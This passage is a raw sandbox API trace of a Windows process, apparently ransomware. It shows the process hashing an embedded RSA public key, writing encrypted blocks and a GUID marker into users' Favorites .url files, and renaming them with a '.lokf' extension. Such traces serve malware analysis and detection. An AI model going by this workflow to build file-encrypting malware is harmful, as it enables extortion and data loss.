pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.671] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.671] GetLastError () returned 0x0 [0059.671] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.671] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0059.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0059.671] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.671] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.671] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.671] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.671] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adb18 [0059.672] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c880e8 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857a0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c88130 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85758 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85800 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85818 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0059.672] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85818 | out: hHeap=0x660000) returned 1 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.672] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f60 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85818 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85800 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.672] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85818 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.673] GetCurrentThreadId () returned 0x9e0 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c84268 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.673] GetCurrentThreadId () returned 0x9e0 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.673] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.673] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85800 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85818 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85788 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85830 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.674] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0059.674] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85800 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85800 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0059.675] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8588 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0059.675] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85830 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85818 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85788 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85758 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88130 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0059.676] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0059.676] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.676] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.677] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.677] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.677] CloseHandle (hObject=0x5cc) returned 1 [0059.677] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262bd0 [0059.677] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0059.678] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE Add-on site.url.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie add-on site.url.lokf")) returned 1 [0059.679] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0059.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8588 [0059.679] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xbe) returned 0x3228c60 [0059.679] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0059.679] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.679] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=133) returned 1 [0059.679] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.681] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.682] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.682] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x85, lpOverlapped=0x0) returned 1 [0059.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.682] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.682] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.682] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8588) returned 1 [0059.683] CryptCreateHash (in: hProv=0x6b8588, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.683] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.683] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.683] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.683] GetLastError () returned 0x0 [0059.683] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.683] CryptReleaseContext (hProv=0x6b8588, dwFlags=0x0) returned 1 [0059.683] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.683] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.683] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.684] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.684] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.684] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.684] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.684] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.684] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.684] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.684] CloseHandle (hObject=0x5cc) returned 1 [0059.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xb0) returned 0x3290398 [0059.685] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 